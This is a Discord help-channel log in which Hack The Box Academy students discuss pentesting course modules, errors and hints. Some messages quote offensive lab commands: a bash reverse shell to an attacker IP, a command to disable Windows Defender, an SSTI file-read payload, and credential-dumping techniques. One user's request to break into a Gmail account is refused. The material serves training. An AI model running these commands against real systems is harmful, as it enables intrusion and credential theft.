#modules

Oh ok.

Server Side Attack - Blind SSRF
https://academy.hackthebox.com/module/145/section/1300

Which port is open in addition to port 80?
Any tips?

Fellows: crackmapexec or netexec?

Netexec, crackmap is archived

And netexec is the fork of it anyway

fuff ports

learing process finish 😄

I saw very impressive things, are there more resources on these subjects?

please someone can help me with this error

Which error?

Have anyone open Dm to discuss about SA in Introduction Evasion AV module ?

Hi could someone help me with "Subdomain Bruteforcing question"? (module: INFORMATION GATHERING - WEB EDITION). Tried many different things but none of them seems to work.

Already section has provided procedures
Do the same

Just try changing the wordlists
Maybe

nvm, got it

Sure

why i cant send messages to general?

Program 'GodPotato-NET4.exe' failed to run: The specified executable is not a valid application
for this OS platform.At line:1 char:1

https://academy.hackthebox.com/module/19/section/117
ive done this box and got approx 20 detections by the IDS, is it okey knowing its a easy lab or should i improve something

i think the detections were like maximum 10 since every web refresh added 2 detections

Password Attack Module :: Network Services Section
Hydra: doesn't work well for attacking SMB or is it just me / the HTB system / I'm missing a trick? I got definite results using NetExec / CME / and MSF.

Read and follow the instructions in #welcome

Identification error: please contact an online Moderator or Administrator for help.

This exercise behaved strangely for me as well. It seemed like I got a lot of detentions by simply refreshing the web page that showed how many detections had happened, but not so much scanning the box. You're good if you recognize the arguments to tone down aggression on scans.

how can I find admin?

HTB Support. Use chat on their main web page. 🤷

you can DM me

I see, how many detections did you have? Also it is strange the firewall seemed to not work even after I was "banned"

the identification errors are specific to Discord, so support on the website can't help

Thank you for the insight. If the question comes up in the future I'll refer to a discord moderator.

It's been a while since I did that module so I don't remember how many I got. I only remember refreshing the page and seeing the detections number change each time, but the nmap scan didn't really seem to effect it that much. I'll fire it up now and try to see if I can come up with a clearer answer.

Alright, thanks!

Hmmm, somehow the port 53 opened itself? Until 3 minutes ago it was filtrated and I couldn't access it in any way and now I suddenly can, does anyone have an explanation?

Day 2 of hitting Flag 1 , inorder of flag 1 , i think i discovered a lot of info required for other few flags maybe , but still im stuck at flag 1 still , this is clearly making me feel frustrated at this point guys as I'm running out of ideas at this point.

Hello there, I'm really stuck in the malware analysis module on the orange.exe registry key. I've identified the function, and I'm 99% sure I've identified the path but I have a formatting error or something when pasting in the registry key. Can anyone give me a hint please?

Edit: Solved... I was pasting it in with the double slashes, my brain is fried

Is anyone able to help me on this weekend?
It's kinda silly but I can't ssh into this target.
In the security monitoring & SIEM fundamentals module
On the skills assesment for this module, the module doesn't give a username or anything so I just type ssh then the target IP address and it says:

ssh: Could not resolve hostname 10.129.142.91:5601: Name or service not known

We are pretending to be an admin here so I tried admin@ but that doesn't work either

I have a problem. I am in https://academy.hackthebox.com/module/77/section/844 currently and don't know what to do anymore. I ran linpeas and checked a lot of files and still have no clue where to do something. Can anyone give me a hint?

Try using sudo -l

It returns
Matching Defaults entries for user1 on
ng-1399082-gettingstartedprivesc-ip3tc-5bfd7469b9-78zfc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User user1 may run the following commands on
ng-1399082-gettingstartedprivesc-ip3tc-5bfd7469b9-78zfc:
(user2 : user2) NOPASSWD: /bin/bash

If you spawn the box and load the status page, the counter seems to start at 50/100 detections. If you know services are on there already you can get the answer without incrementing it at all. Like I remember, refreshing that status page seems to make the counter increase more than the scanning itself. And your observation that there isn't any firewall attached to the counter is accurate -- being blocked doesn't actually seem to stop any communication w/ the system.

now try and use that information

I see, now I have another issue, I can't seem to get around https://academy.hackthebox.com/module/19/section/119, could you maybe give me a hint?

Could you please name the module and section you’re on? That way other people can help too without having to click your link to see what you need help with

did you try ssh <user>@<ip> -p <port> ?

Anyone have problems with virtualization on the windows 11 enterprise evaluation vm in the setting up module?

Sure, it is the Network Enumeration with Nmap, section Firewall IDS/IPS Evasion - Hard Lab

Awesome, I haven’t done that one yet, so can’t be of any help 🙂

the module doesn't say what user I am going to assume to ssh in

Alright, no problem

but I tried the ssh ipaddress:5601

I cant find virtualization in BIOS on this windows 11 enterprise evaluation vm, anyone dealt with this?

i just reviewed the assessment page, i do not understand why you are trying to ssh into the box. you just have to connect to elastic via your web browser

hahaha

thank you quiet

looks like slowmode is enabled in my brain too today

what are you trying to do? run a kali vm inside a windows vm?

That is a tricky one. Be sure to thoroughly enumerate the ports that are open and note any oddities. Once you spot it, you'll have to try a few tricks to get an open response and pull any info out of the service.

Hey in the active directory section prinstspoofer actualy what does that tool do ?

In terms of seimpersonation

Yes, I am just following the Setting Up module
Setting Up > Operating Systems > Windows

Dms?

Hello guys :-

Am stuck on Firewall and IDS/IPS Evasion - Medium Lab Exercise.

Am trying to get the DNS sever version and I have really ran out of ideas. I tried all the steps on the DNS Proxying and really have failed to retrieve the version even with netcat.

for me it worked by waiting, the firewall just stopped after a while

I managed to use netcat and it worked lol, no idea how

imo that's kinda a bad idea. But if you google 'nested virtualization' with your hypervisor and hardware, there are resources on how to do it,
But if you are not familiar with messing with your bios etc, i would skip that. It is not needed to complete the course. You are better off having a kali vm and a windows vm.

I thought it seemed strange but I've been away for a while and wanted to try and kind of start fresh. I don't have any issues with changing things, although I can't seem to install windows 11 on my system because secure boot always boots from the wrong drive and I cant seem to change it, but I digress. I wonder why the module would suggest to do it this way then.

I missed the DM request over lunch. Great news though! Play around with the netcat options to see which was important. This was an odd one.

Its suggesting that I build this and use it as a penetration testing host.

it can be practical to have a windows attack host and all the linux tools in the same box, even if you do things like incident response, linux tools are better to parse through logs for instance. You can still do it if you are confortable with it, just google the issue, solutions will be specific to your cpu and hypervisor

I've never used WSL so I was a little excited to try it out. I have a minimal kali vm through wsl2 that I downloaded straight from the store but I haven't messed with it much because I wanted to get the vm working too. I feel like all I've done for hours is google it, but I will keep charging on.

Oh shit

Hmm nested vm is enable in virtualbox too, thought that was going to be it

i think the most common configuration is having a hypervisor like vmware or virtualbox then a kali or parrot vm as attack host.
I wouldn't like having kali in wsl on my main windows host. Things needs to be separated in my opinion.

Completed the Linux fundamentals module. I’ve been using windows all my life (nothing cybsec related), should I skip the windows fundamentals module?

i'd say no, even if you use windows, there are new things to pick up i guess

Yeah that's why I wanted to get it working in the vm, I usually just run a full Kali VM or run it on one of my laptops but having both in one inside a vm sounds kind of fun and I like to try new things

Alright, thanks

I agree, worst thing that'll happen is you won't learn anything

I'm really at my wits end with it right now

yeah, maybe someone here will give you a working solution, but as this is something specific with your config, i think you'd be better off googling for an answer. From here it is difficult to get a clear view on your problem

Hi everyone,

I'm currently in the Advanced Deserealization module and struggling with code understanding and exploitation because I never used C# before. I finished the Introduction to C# module but I still feel a big gap. Maybe someone can recommend resources to learn C#? Especially in the context of web apps.

Appreciate any advice!

Hey im trying to solve Ad skill assesment part 2 and im trying to solve SUBMIT THE CONTENTS OF FLAG ON ADMINISTRATOR DESKTOP ON MS01 HOST

I found a set of creds with crackmap dumping lsa with the user administratot and a password i set

Have a look at C# courses on Udemy or Youtube. In addition, a former HTB employee recommended this book to me.
Pro C# 10 with .NET 6: Foundational Principles and Practices in Programming

Thank you! Your advice is always gold worth ❤️

I am facing the same problem. I still have to learn C# and Java before I attempt the exam

In the password attacks module, in NTDS.dit section, they use a password list called /usr/share/wordlists/fasttrack.txt, but in my pwnbox there is no list as this

I can't establish a reverse shell. My machine runs nc -lvnp 1234 and the target bash -c 'bash -i >& /dev/tcp/10.10.14.110/1234 0>&1', just like the lesson told me. The target has no internet connection and I can only use the bash command. Why isn't it working?

which module is this?

this one https://academy.hackthebox.com/module/77/section/844

I'm hard stuck on this module "Windows Event Logs and Finding Evil" if anyone is willing to help. I'm on #3 about finding the process that injected into the process that executed the unmanaged powershell

hi I'm on same lesson. If I solve it myself and you still need help later today or whatever I'll help you but not until I solve it.

why am I getting this error?

I am on Passsword attacks Skills assessment Hard, I am still getting this error after following:

https://unix.stackexchange.com/questions/31900/smbclient-alternative-for-large-files

Windows Privilege Escalation Skills Assessment - Part I
Was there really a way to get the ||ldapadmin password|| before having a SYSTEM shell? It seems that most people do it in that order, but the question is asked before telling us to escalade privileges. I just want to know if I'm chasing the impossible
Edit: I am

Can I use the modules pwn box to solve machines ?

hi there's an issue with the reverse shell section of shells and payloads module. This command to disable Windows AV doesn't work even if you copy and paste it into the Windows target box:

Set-MpPreference -DisableRealtimeMonitoring $true```

it gives me an error that says:

PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true                                              Set-MpPreference : You don't have enough permissions to perform the requested operation.                                At line:1 char:1                                                                                                        + Set-MpPreference -DisableRealtimeMonitoring $true                                                                     + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                         + CategoryInfo          : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Set-MpPreference],      CimException                                                                                                             + FullyQualifiedErrorId : HRESULT 0xc0000142,Set-MpPreference```

the section says to use that exact command

this is on the target box

I am able to RDP in successfully but once I RDP in that command won't work. how do I fix this?

This VM is so slow

Getting this error when trying to VPN into target system -
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-unit-files ===
Authentication is required to manage system service or unit files.
Multiple identities can be used for authentication:

1. mrb3n
2. cry0l1t3
   Choose identity to authenticate as (1-2): 1
   Password:
   polkit-agent-helper-1: pam_authenticate failed: Authentication failure
   ==== AUTHENTICATION FAILED ===
   Failed to enable unit: Access denied

I've restarted and log out of the system several times/

I just completely logged out of Hack the Box. I guess I'll try again later.

Do u need to perhaps do it from an admin ps session

Hi

Task scheduling Question what is the type of the service of the “dconf.service”?

answer notify I'm writing this answer, but I don't accept mistakes

Can you help me if you don't mind?

[23:18:39:600] [49475:49476] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[23:18:39:600] [49475:49476] [WARN][com.freerdp.crypto] - CN = WS01
[23:18:41:108] [49475:49476] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

I'm doing windows funds room but when trying to rdp into the machine I get a cert error any ideas?

Can you clear xfreerdp's cache or config file? I'll bet you connected to another system at that same IP and it remembers the old cert; thinks it changed. Just a guess.

https://academy.hackthebox.com/module/112/section/1069 Stuck on last question. I am running two wordlists at the same time, still haven't found any host with ip that ends in .203 yet. It's been running for a while. Hint says use different wordlists, and I'm trying but the process is tedious.

Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:
Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt:
so far. Ther are like a dozen different wordlists though. Hmm.

I should combine all the domain wordlists into one and remove duplicates, master list, and sort it. Might help.

Yes you are right

I just ignored the cert tho ans it worked ty

Here's an article with a fix to, but good call 👍
https://servicedesk.mtu.edu/TDClient/1801/Portal/KB/ArticleDet?ID=96506

Hey! In the "Intro to whitebox pentesting" Skill assessment, is there a way to get /flag.txt without doing it via ||sleep timers||?

Could someone give me a hint on which wordlist to use? I've tried a few so far and no luck...

You need a fierce wordlist

Also subdomain of subdomain

It helps if you include the module and section name as well not just a link

It won't

ok

I will try that list thanks. I'll also try to include the module name and section

https://academy.hackthebox.com/module/112/section/1069 in this link, where can I find the module name and section name? I don't see them. Section name is Foot printing? what is the module? I know it's module #3 of the pentest job role path, but I don't know the name. This is just really extra work. It's much easier for someone to just click the link and look at the question

Nope. Foot printing is the module name.

Section is DNS

It's extra steps to look this information up. How necessary is it to provide module name and section name? I thought the link would be more than enough for someone to directly look at what is being asked about. I don't see it necessary to look up the module name and provide it. If you click the link, you can see the material and the question on which I'm stuck. That's the fastest way to my understanding. Thank you.

Thanks for the tip. Found it very fast by using that wordlist.

Otherwise I'd have to go through each list one by one and that would have taken a very long time. Much appreciated.

This is where your link takes me, whats the question?

Intersting, sir

When I click the link I see this:

I see. So we see different things?

Well I can see why it would be useful to include some extra information

Yeah I can see now

It appears so

If the link I share doesn't show you the same thing as I see, then yeah, then you need more info

It's because maybe you don't have academy and you have to be logged in? Just a guess

Nah Im logged in, I havent started that module yet though which could be why

Hmm.

I have a student account as well

I don't understand, I'll include the name and section name, sure

hii

Well if it takes you to the module page, you only need the section name from me then

very true

That I can provide, np

Looking up the module name is not so easy, you have to leave the page, open the modules link, the click current in progress module to see the module name.

So yeah, I can totally provide the section name with a link, np. Thanks.

I didn't realize we saw different things from the same URI

what

Glad we got it figured out 🫡

Cheers

to get started check out #welcome to verify your account

Is there an extra step to get internet connectivity within pwnbox? Im working through the first module "Intro to academy", and cannot visit the target system using Firefox. The connection times out.

Also this is my first post, and I'm very new to HTB 🙂

Yooo

Alright looks like I can land on the target within the learning module, but strange that public websites timeout. Is there a way to allow the pwnbox in the browser to get external internet access?

Hello everyone. Ran into an issue today while doing :https://academy.hackthebox.com/module/19/section/118
When I run the solution given by the "Show solution", it works in the PwnBox but not from my PC (Parrot OS). I have downloaded the VPN file again just to be sure but without any success. Any reason for that or hint about what I should do? It is not the first time it happened to me.
I also check the nmap versions, they are exactly the same.

Having trouble on Preignition
I was able to install go and pull up the the list of switches under the help command. However, I keep getting errors when running the sudo gobuster dir -w /usr/share/wordlists/dirb/common.txt -u {target ip}

it seems that the VPN and the PWNBOX are connected to different network for some reasons?

Strange. Not the best experience for the introductory module. I only have the option to spawn the pwnbox and the target machine. Not a huge issue, as it does allow access to the target machine. Wondering if this is intentional for this particular exercise. Only tested an external website because the target machine also timed out initially. Still an interesting edge case.

Also I continued and did the next lab. First time it worked in the pwnbox and not in my pc (this is how i found out i was on different network as the port shown were different). Then when I changed the server, redownloaded the file, reboot both the PC and PWNBOX, the nmap part works but not the solution I used previously (same for solution preset in the show solution thingy).

Hello?

Do you get an error message?

Hi

Spoiler alert : For context, the first time I tried the Hard lab, the nmap and netcat command were working as expected and I got the flag. Then when I tried on my PC it failed. I then found out that for some reason i was scanning different PC (VPN issue maybe?).
I then changed the VPN and location so my PC and the PWNBOX(SG server) were both on the same VPN (US Academy 6). Re-downloaded the file for my PC. The nmap scan finally gave the expected result for both of them, but I was not able to get the flag using netcat like before (or the solution given in the "show solution"). On the Pwnbox I had a request timeout and on my pc:
sudo nc -nv -p 53 10.129.184.246 53
(UNKNOWN) [10.129.184.246] 53 (domain) : Connection refused

if you are using the free plan, you have limited internet access

Good to know, thanks.

Are you using TCP or UDP?

I tried both

But you only have either VPN or PwnBox active, right?
Both together do not work

Ah that might be why. Let me check that out. But it seemed that in some cases I could not do it even with just one on

If it does not work with the PwnBox and you do not have a VPN active, then contact support

New to HTB, only have done a few in "Starting point". I had difficulty connecting through TCP. UDP worked though. Anyone know why, or if this is a common issue? Connected using OpenVPN in a Kali VM on my home machine.

Hello folks. I'm on this: https://academy.hackthebox.com/module/112/section/1072, FOOT PRINTING, SMTP, Last Question:

I'm using msfconsole to do smtp enum on a username wordlist, but what other wordlists can I use for usernames? The hint says:

On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times.

Where can I find this footprinting wordlist on Kali linux? Thanks.

https://nmap.org/nsedoc/scripts/smtp-enum-users.html#script-args I can't figure out this script, if it's possible to give this script a custom wordlist to use

The list can probably be found under Resources. If the module provides you with a list, it is not included in Kali

So I should use Parrot OS? The list is in there? I can't see any link for any list in the module

I have just tried with the VPN alone (no pwnbox) it does not work. Same witht he pwnbox. And despite using the same VPN scanning the server gives me 2 different nmap result. I think there is an issue with the VPN. And I cannot use netcat in either case. Same error as before

Oh ok

Thanks very much!

Then contact support so that they can check this

Thank you for your time

I'm having a ROUGH time with ACTIVE DIRECTORY ENUMERATION & ATTACKS:Kerberoasting - from Linux (https://academy.hackthebox.com/module/143/section/1274). It seems like th domain controller isn't running? I've tried restarting the server a couple of time. Also my SSH keeps dropping my connection every 30 seconds or so (both personal machine and pwnbox).

┌─[htb-student@ea-attack01]─[~]
└──╼ $GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[-] [Errno 113] No route to host
┌─[htb-student@ea-attack01]─[~]
└──╼ $for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
64 bytes from 172.16.5.225: icmp_seq=1 ttl=64 time=0.067 ms

Any suggestions?

No you don't

It's literally at the top of the page

Change vpn regions

Huh yeah I see the current regoin I'm using is under high load, I'll give that a shot. But would that fix the domain controller issue?

Potentially, I also suggest switching EU to US or vice versa

Hm that seems kind of counter intuitive 😅

It seems odd but some regions just work better

Thanks!

Hm I hate that that fixed all my issues, thanks!

Your first clue to changing regions/regenerating your vpn was the random disconnects

hello, still same error

my first juicypotato hit after 8 tries and it sends some weird data that kicks me out 💀

aight we good

whats the difference between -sS scan and -sT - my confusion is that both send the same SYN flag and wait for a RST or SYN-ACK packet?

nevermind

-sS is half connection

closes the connection and doesnt allow full connection

Yes I want to learn it

Are you on the module?
Did you have a particular question or issue?

I'm starting to learn it
I'm a beginner
I'm just prioritising to learn these skills so that I can start my bug bounty journey asap

Prioritize learning it over speed

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II

So far, I have managed to get credentials for m* domain account. This user has administrative rights over M* server. BloodHound shows that the user also belongs to Domain Admins group. However, when I execute whoami /all command, it doesn't show that the user belongs to Domain Admins. Furthermore, I have tried to do the following:

1. DCSync using mimikatz => ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
2. Add the user to A* group => Insufficient access rights to perform the operation
3. Take NTDS.dit dump => cannot be found on \Windows\NTDS\NTDS.dit location, searched and found one on \Windows\WinSxS directory, but decrypting using secretsdump.py gives error
4. Take LSASS dump => Only contains information about the same user and computer account(whose hash cannot be cracked)
5. Checked for noPac, PrintNightmare, ASREPRoasting, PetitPotam
6. I know the user C* that I need to get access to. But I am not sure how.

Love solving skills assessments and then looking up a write up and finding out I did it a totally different way than normal

now it's the time to capture some stuff

also I'm pretty sure the machine account won't be in the DA group

Could anyone help me with API Attacks module with question about attacking user masonjenkins@yamil.com ?

Oh, I understand now. That's the module name. I see. Thanks a lot. I was confusing myself.

Hi all, im stuck on the linux privilege escalation (environment enumeration), I know i need to sudo with lab_adm. HOWEVER i cant figure out how, i tried sudo -u lab_adm /bin/ncdu, but that give me permission denied, I tied sudo -l -u <command> nothing works permission denied. What am i supposed to do ? to get into the lab_adm accounts?, I tried sudo -i -u lab_adm <command> , and essentially any combination of sudo + switch + lab_adm you can think of. nothing is working. SO i HAVE TO be doing something wrong

Hi I need help around "Exploiting SSTI - Twig". I get the answer through RCE. However the LFI part does not seem to work
payload name={{ '/flag.txt'|file_excerpt(1)}}

https://imgur.com/a/cRhFV0c (sorry for imgur link, somehow I can't upload an image)

anyone got a go to list for fuzzing file upload extension ? I know about those ones from seclists and payload all the things, but they seem incomplete, not fuzzing everything

Like what?

in the "Intrusion Detection With Splunk (Real-world Scenario)" module, in question no 3. How do I identify a suspicious process that load clr.dll? In fact, there are many legitimate processes that load clr.dll, such as powershell.exe, etc.

@simple loom

@acoustic owl yes, I get an error message

Working around sysmon event id 7 (Image Load). This way you can identify what images are loaded. Once you identify one PE that might be interesting, you can see the processes it started, who us parent to, etc…

what can you capture once you get system? I think we've talked about this before

https://academy.hackthebox.com/module/112/section/1073
Module: Footprinting
Section: IMAP/POP3

Last question: Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

I've fetched the email, full with body, and I can't seem to find the flag anywhere. Could any give a hint on where I'm supposed to see the flag?

yes

just dm

Finally got everything done except AEN. Excited to go into it blind and see how good my notes are 😄

Which will likely turn into sadness real quick

I see two mailboxes. INBOX has nothing. the other inbox has 1 email. I fetch it, full with body, and I don't see flag. So I'm lost for right now.

on what basis would a file.exe that load clr.dll be of interest?

i did not retry it recently but it was doable with fetch command. Another option is to use evolution mail app, setup the compromised account and retrieve the inbox content

Oh. You don't just fetch it, you fetch with specific RFC paramter

I got it now. I saw some example of fetch with RFC822 and I tried that and was able to see email body finally

Thank you

When running bruteforce methods on Academy, is there a wordlist one should use specifically. Like in Labs where there is set lists.

SecLists in general will have what you need

Introduction to Pivoting, Tunneling, and Port Forwarding
SOCKS5 Tunneling with Chisel

Should I try using another version of Chisel or try and install the dependencies?

just download the older release from the repo

YARA & Sigma for SOC Analysts - Skill assessment
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r

Does anyone know how to approach this question in the intended way

I have solved it simply using regex analysis of the strings output of the binary for strings that look like L________r which is probably not the intended way

I haven't found any other way to solve this

Focus not that much on the exe that loads it, but the childprocesses that are generated by an exe that loads it (Check for images or processes created by processes with parent process the one that loaded)

When I access the URL through browser it works fine with download but CLI throws this.

Do you think it's because it is not the main repo?

Since it is .NET you could always analyze it using dnspy and check for those classes 🙂

you can only git clone a whole repo, for individual files use wget

git is only valid for git related stuff

Thx

What web browser am I to be using here? (Shells & Payloads skills assessment)

firefox in the terminal

it works, thanks

hello guys can i have some help for the module digital forensic practical scenario ?

Good afternoon, looking for any pointers on the CrackMapExec skills assessment question 3. I've compromised the SQL Server entirely, dumped creds and tried to reuse the hashes (have been unable to crack them). I've run a couple of different scripts as an admin looking for interesting info with no joy on the SQL server. I've identified an Intern user from the SQL database and found a writable share on the DC and tried to see if I can get anyone to authenticate via a malicious file in the share (there doesn't seem to be any info in the share itself). Tried a few different ways to enumerate the DEV server with no joy. Haven't got anywhere with the CME modules looking for group managed passwords etc also. Starting to run out of ideas.

Are you doing 1 fetch 1 all? If so, that's why. You need to fetch the body[]

good idea

Just a short feedback for devs - Rpivot (Pivoting, Tunneling, and Port Forwarding) depends on python2.7 and apparently it was removed from Parrot OS (?) - not available for install in PWNBox.

Fix Install Python2:

curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
pyenv shell 2.7
python --version

Credits to whomever posted this, bc I got that on my notes a while ago hahaha

Hi

Contact Google for support with Gmail

Me try it over a month but Google is not answering

I know my gmail account old password anyone can help to get it's password 🔑

There is nothing we can do here in terms of Google Accounts.

Google Support only

Me try to all but account is not recover

So I need a one cyber expert to recover it

No, that is illegal and will not be tolerated here

But I need you know any person

https://support.google.com/mail/troubleshooter/2402620

This is also done

Me post on community but Google is not answering

Be patient or take your loss. We can not help you as that would be illegal.

module: Information Gathering - Web Edition
section: Web Archives

How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.

Where can I track how many are there labs?
I mean at all, I know how to use web archive, but I never seen htb post a number of labs

HTB has not always used the TLD com 😉

||a fetch 1 RFC822|| It has to be this. I was doing a FETCH 1 ALL or a FETCH 1 BODY

||* a fetch 1 all
1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))
a OK Fetch completed (0.001 + 0.000 secs).
||

The brackets are required with body[]

It's why I explicitly put them there

body[] does the same thing

I see

This is for the one with ICMP tunnel - do I have to degrade my attacker GCLIB version before compiling ptunnel-ng?

#modules message

Soo I suppose I need to install some autoheader?.. Not that experienced with compiling tbh..

no compile it in your host

oml.. my bad

Man this was hella clunky but thand God it's done

That was a miserable exercise.

The ideas are cool but the environment is like from the 90s

the password attack module is taking me way longer than the 8 hours it mentions in the module description lol

What i do wrong?

are the lists in your current directory?

also bruteforcing winrm is very inefficient, even if your lists are small it will still take forever

You’re not alone mate. Took me ages.

I do as in the module

well do you have the lists?

also what module and section

"password.list" is just an example, you should you your own pass file

Can anyone help me to install the vpn? i'm lost i just started today

openvpn is installed by default on kali

what do you use

Mod Password Attacks sec Network Services

yes so you'lll need a list before you can spray

it's just an example

Okay, but then which sheet to take.

I can't find it

https://www.kali.org/tools/openvpn/

so im doing the linux fundamentals, and im doing the first questions, and i feel a little lost, idk if theres something i missed, but the question is "What is the path to the htb-student's mail?" i figured it would be /var/log or /var/mail as the answer but there both wrong and im kinda just lost, didnt know if anyone could point in the right direction to go, i dont want the answer to it

usually cmd looks like
"sudo openvpn academy-regular.ovpn"

you are on right way, there should be smth in /var/mail

there is not, i ran ls and nothing came back

it says i have to type install openvpn to get but where? 😭

the terminal..

it should be installed by default, this command should work

if you are using kali, there is no need to install openvpn. if you are using pwnbox, you don't need to connect to vpn.

if you are using kali, and want to connec to vpn, just use the command "sudo openvpn path/vpn_file.ovpn"

i think it worth to try first the linux fundamentals module

https://forum.hackthebox.com/t/what-is-the-path-to-the-htb-students-mail/3793/2

thank you so much, i completely forgot about the /etc dir

I don't think it is an answer...

i dont think so either, but it is a very helpful

there is another answer on the forum

you should read again what is env

I believe it should be in the module

i even used env too and i had the answer in front of me at least 3 times im blind as a bat omg i feel embarrassed af ngl

well we live and we learn

it's okay

Have been stuck on this
Can't enumerate the username at all via brute force or exploration.
Valid username filter "Invalid credentials."
Invalid username filter "Unknown username or password."
Used xato 10 million and names.txt both from SecLists.

Cookie's are PHPSESSID and aren't exploitable.

Profile.php can't be accessed by modifying the status code or anything.
And 2fa.php won't work with any registered user. Tried to brute force till 10k combinations with the current sessid of my registered user.
https://academy.hackthebox.com/module/80/section/848

Windows Privilege Escalation
Communication with Processes > Named Pipes
"From here, we could leverage these lax permissions to escalate privileges on the host to SYSTEM."
How? By using getsystem through a meterpreter shell? Did I miss a concrete example somewhere in the CPTS path?

Hello, i am running into an issue here, Module/hacking wordpress/skill assessment... I get the following, any help?

Did you try to open the url in a web browser?

yes, the website is displaying nicely

but is it running wordpress?

is it not supposed too? it's the wordpress module. am i miss something

explore the site

I found a flag and some reason HTB is not accepting it

i hear you, okay

check the port, check where the site is placed... maybe it's like http://ip/wordpress

or maybe the website is located on a subdomain 😉

why go this far for easy module

check the flag format, or maybe if there are more questions, maybe you are not entering the right flag for that question

glad i'm not the only one lol

I did HTB{flag}

always take into account all the options, pay attention toe details and try debbuging, because you will learn a lot trying to fix things or understanding errors

what module and section?

JavaScript Deobfuscation Source Code

check for spaces

No spaces

if there are spaces before, or after, you will get that error

None before or after

let's not just put flags here outright yeah, even if it's a tier 0 module

My bad

that's not the right flag for that section

💀💀

Alright I’ll figure it out then

got it working now, thanks ! @next bronze @steady dust

the name of the section would be a hint

Hi, I'm trying to resolve the question "How many total packages are installed on the target system?" in the "File Descriptors and Redirection" section from Linux Fundamentals module. I've tryied with use find command and searching some extensions (.deb, .dpkg) and other option, using "apt list --installed | wc -l" but i haven't obtain the correct answer. Some hints that it can redirect me? Thanks so much!

Subject: Linux Fundamentals - The "Find Files and Directories"

Feedback:

• Material covered has nothing little to do with the exercises presented to us
• would be beneficial to see the format desired for question 1 " What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"

I have tried all conf files that I can determine work:

• auto.conf
• tristate.conf

Neither work and The "Show Solution" button does not work

If anyone has any suggestions please let me know

Hi, try: " find -name *.conf -type f -size +25k -size -28k 2>/dev/null "

Hi, I have tried this now: " dpkg --list | grep '^ii' | wc -l "

Hi, I need a little help to understand the csrf token theft in this module: Cross-Site Request Forgery (POST-based) (Session Security cours)
I don't understand how HTML injection is used to send the token to our server

Evening don't suppose I could get a nudge with this? Still stuck.

Hello Hackaz! I am in SQL modules: https://academy.hackthebox.com/module/33/section/194

The question I need help with: Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?

It says I am logged as 'admin' which was demonstrated in the article, but I am supposed to be 'tom' and find a flag which doesn't appear to be in a source code or in the network tab.

I'm having trouble getting my Noriben file to save on the malware analysis module

have you tried using 'or' logic within the username field?

I know what you mean, but I am already in with username tom. There is just no flag. I think it is a bug.

if it's showing admin, your not logged in as tom

Then it must be bug.

Will try it again tomorrow, if I still don't get the flag, I'll open a chat.

Hello, I need some help please on SERVER-SIDE ATTACKS module, Identifying SSRF, stuck on Exploit a SSRF vulnerability to identify an internal web application. I have no idea how they want me to identify an internal web application with SSRF.
https://academy.hackthebox.com/module/145/section/1295

I'm currently on domain information from footprinting and it's straight gibberish, I can't understand like anything at all, could someone help me by explaining the commands in this section? Thank you!

https://academy.hackthebox.com/module/112/section/1061

In Information Gathering - Web Edition Creepy Crawlies, I need to identify the location where future reports will be stored but all that I am finding is this. While gives me a hint that something might be in the comments but it says to give the answer with the full domain. Any suggestions to finding more info through the reconspider?

Can anyone help me with lockphish in kali

There is a problem in direct link

I am not getting any direct link as output

I am not able to upload pic here so plz help me with this if anyone can

those are what's showing in results.json?

It's what the module gave me .The domain its asking for me to do reconspider on is the same as the example. But when I download everything in the module and run the reconspider, it says permission denied and doesn't save anywhere. But running the same command with sudo says python3.pv doesnt exist.

